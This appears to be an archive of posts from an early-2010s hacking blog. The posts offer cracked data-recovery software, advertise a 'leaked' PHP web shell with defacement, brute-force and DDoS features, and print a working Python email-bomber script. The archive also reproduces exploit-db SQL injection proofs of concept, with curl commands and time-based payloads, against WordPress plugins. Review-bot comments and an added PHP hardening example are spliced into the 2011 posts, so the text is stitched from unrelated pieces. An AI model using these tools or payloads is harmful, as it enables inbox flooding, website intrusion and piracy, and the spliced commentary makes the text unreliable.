Monday, April 02, 2012

Download GetDataBack v4.25


Do-it-yourself Data Recovery Software

GetDataBack is more than an undelete or file recovery program or a system restore:
Whatever happened to your drive-

GetDataBack will recover your data if the hard drive's partition table, boot record, FAT/MFT or root directory are lost or damaged, data was lost due to a virus attack, the drive was formatted, fdisk has been run, a power failure has caused a system crash, files were lost due to a software failure, files were accidentally deleted...

Recover even when Windows doesn't recognize the drive-

GetDataBack can even recover your data when the drive is no longer recognized by Windows. It can likewise be used even if all directory information - not just the root directory- is missing.

Get everything back-

Advanced algorithms will make sure that all directories and sub directories are put together as they were, and that long file names are reconstructed correctly.

GetDataBack is safe-

GetDataBack is read-only, meaning the program will never attempt to write to the drive you are about to recover. Please make sure to read the safety instructions...

GetDataBack is easy to use-

The software enables the regular user to conduct his own data recovery by guiding him through three easy-to-understand steps, while giving the advanced user the possibility to interfere with the recovery and improve the results by examining the scan log, the file system details, and file and directory information, by selecting the sector range to be scanned, by choosing excessive search for file systems or search for lost files, and by calling Runtime's DiskExplorer.

Recover files over your local network or over a serial cable-

This feature enables you to run GetDataBack on one computer ("remote") while accessing the drives of another computer ("host").

Recovering data over a network is useful, especially when you are not able to remove the drive you want to recover from and attach it to another computer.

Just download HDHost and install it on the computer you want to recover data from. Click here for further instructions...

Please note: Installing HDHost or any other programs on the drive you want to recover from can cause data on that drive to be overwritten.

If at all possible, we always recommend attaching the drive as a second drive to a working computer and running the data recovery software from there.


New
Step by Step Guide: Doing a Data Recovery with GetDataBack

New
You can run GetDataBack from a WinPE boot CD-ROM.

New
GetDataBack now supports Unicode.

Now you can recover files whose names are encoded in non-standard character sets. This includes all Unicode character sets, such as Japanese, Chinese, Korean, Russian, Greek... We recommend performing the data recovery on an NT/XP computer because Win9x/ME does not fully support Unicode.

download Get Data Back New Version.rar + crack




Saturday, February 25, 2012

Best Shell From Andha Hacker

SyRiAn Shell V7 - priv8! - LEAKED! ! ! !

--Features;
- Mass Defacement Script
- Zone-H Defacer Adder
- Forum Defacer
- PHP Bypasser
- FTP Brute Forcer
- Admin Control Panel Finder
- Encryption
- Back Connection
- Bind Connection
- Eval
- Safe Mode Bypass
- Open_Basedir Bypass
- SQL manager
- 100% Undetected
- DDoS Attack

AND MANY MORE FEATURES

Source : here

Special thanks to Andha Hacker

Monday, December 05, 2011

pybombmail.py


how to... huhuhu


Here is the Python script
(FIX, now with AOL mail) :p


#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!


import os
import smtplib
import getpass
import sys


server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')




to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')


if server == 'gmail':
        smtp_server = 'smtp.gmail.com'
        port = 587
elif server == 'yahoo':
        smtp_server = 'smtp.mail.yahoo.com'
        port = 25

elif server == 'aol':
        smtp_server = 'smtp.aol.com'
        port = 587

else:
        print 'Applies only to gmail,yahoo and aol. Visit www.kendari-underground.blogspot.com'
        sys.exit()


print ''


try:
        server = smtplib.SMTP(smtp_server,port)
        server.ehlo()
        if smtp_server == "smtp.gmail.com":
                server.starttls()
        server.login(user,passwd)
        for i in range(1, total+1):
                subject = os.urandom(9)
                msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
                server.sendmail(user,to,msg)
                print "\rTotal emails sent: %i" % i
                sys.stdout.flush()
        server.quit()
        print '\n Done !!!'
except KeyboardInterrupt:
        print '[-] Canceled'
        sys.exit()
except smtplib.SMTPAuthenticationError:
        print '\n[!] The username or password you entered is incorrect. FUCKYOU!!!'
        sys.exit()
#http://abi71.wordpress.com/2011/02/03/pybombmail-py/




How to use it, as follows :p





# OS: openSUSE 12.1 :p
# Any damage caused is your own responsibility.

Saturday, October 15, 2011

SQL Injection Vulnerability in the WordPress Contact Form Plugin <= 2.7.5

# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
# Date: 2011-10-13
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
# Version: 2.7.5 (tested)
 
---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php
wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
  
e.g.
curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1
  
---------------
Vulnerable code
---------------
Line 49:
    public function the_content($content) {
        global $wpdb;
        global $table_name;
        global $settings_table_name;
 
        $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
 
        if ($_POST['wpcf_easyform_submitted'] == 1) {
 
            $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
 
---------------
Patch
---------------
 
*** ./easy-form.class.php.orig  2011-10-13 19:53:05.674800956 -0400
--- ./easy-form.class.php   2011-10-13 19:51:21.442799615 -0400
***************
*** 54,61 ****
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
           
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!        
!             $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
               
              $continue = true;
               
--- 54,63 ----
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
           
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!               $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
!             $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);
!            
!   $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
               
              $continue = true;
               
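Review bot: `substr($wpcf_easyform_formid,2)` on new lines 56-57 is not input validation. It only drops the first two characters of the POST value, the remainder is still concatenated unquoted into `WHERE ID = `, and a legitimate one-character id such as `1` becomes empty and breaks the query. Cast the value to an integer (`intval()` or `absint()`) or bind it with `$wpdb->prepare()` and a `%d` placeholder instead. Separately, the `$private_key` literal visible in the context lines is a secret kept in source and should move to configuration.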
***************
*** 71,80 ****
              if ($continue) {
               
                  //loop through the fields of this form (read from DB) and build the message here
!                 $form_fields = $wpdb->get_results("
                    SELECT *
                    FROM $settings_table_name
!                   WHERE form_id = ".$_POST['wpcf_easyform_formid']."
                    ORDER BY position
                ");
                 
--- 73,82 ----
              if ($continue) {
               
                  //loop through the fields of this form (read from DB) and build the message here
!       $form_fields = $wpdb->get_results("
                    SELECT *
                    FROM $settings_table_name
!                   WHERE form_id = ".$wpcf_easyform_formid."
                    ORDER BY position
                ");

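Review bot: the `WHERE form_id = ".$wpcf_easyform_formid."` line in this second query still builds SQL by string concatenation, so its safety depends entirely on how the variable was assigned in the earlier hunk. Bind the id at this call site as well, using `$wpdb->prepare()` with `form_id = %d`, so the query is safe regardless of how the variable was produced. The re-indentation of the `$form_fields = $wpdb->get_results("` line is an unrelated whitespace change and should be dropped from the patch.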
Source: http://www.exploit-db.com/exploits/17980/

Thursday, October 13, 2011

WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability

#Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]
#Date: 2011-09-25
#Author: [cheki]
#Version:[3.2.1]
#Tested on:[linux]
#Used: ["sqlmap"]
#SQL Injection
http:///wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1
#Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)
#[http://:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER()
#http://:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM
mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
#http://:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)
#Home page: http://hacking.ge/
Source: http://www.exploit-db.com/exploits/17970/

WordPress GD Star Rating plugin <= 1.9.10 SQL Injection

# Exploit Title: WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnerability
# Date: 2011-09-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/gd-star-rating.zip
# Version: 1.9.10 (tested)
# Note: magic_quotes has to be turned off
 
---
PoC
---
http://www.site.com/wp-content/plugins/gd-star-rating/export.php?ex=user&us=dummy&de=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
 
---------------
Vulnerable code
---------------
./export.php
    require_once("./code/cls/export.php");
    ...
    if (isset($_GET["ex"])) {
        $export_type = $_GET["ex"];
        ...
        switch($export_type) {
            case "user":
                header('Content-type: text/csv');
                header('Content-Disposition: attachment; filename="gdsr_export_'.$export_name.'.csv"');
                $sql = GDSRExport::export_users($_GET["us"], $_GET["de"], $get_data);
                $rows = $wpdb->get_results($sql, ARRAY_N);
 
./code/cls/export.php
    class GDSRExport {
        ...
        function export_users($user_data = "min", $data_export = "article", $get_data = array()) {
            ...
            $where = array();
            ...
            $where[] = "v.vote_type = '".$data_export."'";
            ...
            $j_where = join(" and ", $where);
            ...
            return sprintf("select %s from %s where %s order by u.id",
                    $j_select, $j_tables, $j_where);
Source: http://www.exploit-db.com/exploits/17973/
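
The `export_users()` code quoted above concatenates the `de` parameter into a quoted SQL string. As an added example (not code from the plugin or the advisory), here is the same kind of lookup hardened with an allowlist and a bound parameter. The table layout, the `comment` vote type and the function names are assumptions, and it uses PDO with in-memory SQLite (requires the pdo_sqlite extension) so it runs outside WordPress:

```php
<?php
// Added example, not plugin code. Schema, data and the allowlist are constructed.
// 'article' is the default shown in the advisory; 'comment' is an assumed second type.
const ALLOWED_VOTE_TYPES = ['article', 'comment'];

function build_export_query(string $voteType): array
{
    // Reject anything that is not a known vote type before it gets near SQL.
    if (!in_array($voteType, ALLOWED_VOTE_TYPES, true)) {
        throw new InvalidArgumentException('unknown vote type');
    }
    // The value travels as a bound parameter, never as part of the SQL text.
    $sql = 'SELECT u.id, u.name, v.vote FROM users u '
         . 'JOIN votes v ON v.user_id = u.id '
         . 'WHERE v.vote_type = :vote_type ORDER BY u.id';
    return [$sql, [':vote_type' => $voteType]];
}

function export_users(PDO $db, string $voteType): array
{
    [$sql, $params] = build_export_query($voteType);
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec('CREATE TABLE votes (user_id INTEGER, vote_type TEXT, vote INTEGER)');
$db->exec("INSERT INTO users VALUES (1, 'alice'), (2, 'bob')");
$db->exec("INSERT INTO votes VALUES (1, 'article', 5), (2, 'comment', 3)");

// A legitimate value returns only the matching rows.
print_r(export_users($db, 'article'));

// Values carrying a quote and extra SQL are rejected by the allowlist;
// even without it, binding would treat them as a literal string.
foreach (["-1' AND 1=1-- ", "article' OR '1'='1"] as $hostile) {
    try {
        export_users($db, $hostile);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Inside WordPress the equivalent binding is `$wpdb->prepare()` with a `%s` placeholder for the vote type.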

Sunday, September 04, 2011

Disabling Right-Click Protection on the Website www.topan.web.id

Isn't it annoying when you've read an article that contains a script to try out, but the site uses JavaScript right-click protection 0_o (why am I venting here? :P).


The website using this right-click protection is Mas Topan's site --> http://topan.web.id/. I casually went there to read an article about downloading YouTube videos without software (it just so happened that yesterday I was dying to download a Jon Lenong song 0_o). When I wanted to try it out, well, what do you know :p. Met nahh... (as people in Kendari say).


I tried disabling JavaScript in Firefox (I happened to be using version 6.0.1 yesterday) by unticking Tools > Options > Content > Enable JavaScript, with no result (maybe because of that Firefox version). After some googling, I found no way around it.


On a whim I tried Chrome (I'm a Firefox addict, so I rarely use FX) and went into its settings menu (see screenshot)










and the result



Hope this is useful, greetings of freedom XD :P

Here is the YouTube download script I mentioned above


Download YouTube video in "Regular Quality" (RQ)
javascript:window.location.href = 'http://youtube.com/get_video?video_id=' + yt.getConfig('SWF_ARGS')['video_id'] + "&l=" + yt.getConfig('SWF_ARGS')['l'] + "&sk=" + yt.getConfig('SWF_ARGS')['sk'] + '&t=' + yt.getConfig('SWF_ARGS')['t'];


Download YouTube video in "High Quality" (HQ)
javascript:window.location.href = 'http://youtube.com/get_video?video_id=' + yt.getConfig('SWF_ARGS')['video_id'] + "&fmt=18&l=" + yt.getConfig('SWF_ARGS')['l'] + "&sk=" + yt.getConfig('SWF_ARGS')['sk'] + '&t=' + yt.getConfig('SWF_ARGS')['t'];


Download YouTube video in "High Definition" (HD)
javascript:window.location.href = 'http://youtube.com/get_video?video_id=' + yt.getConfig('SWF_ARGS')['video_id'] + "&fmt=22&l=" + yt.getConfig('SWF_ARGS')['l'] + "&sk=" + yt.getConfig('SWF_ARGS')['sk'] + '&t=' + yt.getConfig('SWF_ARGS')['t'];


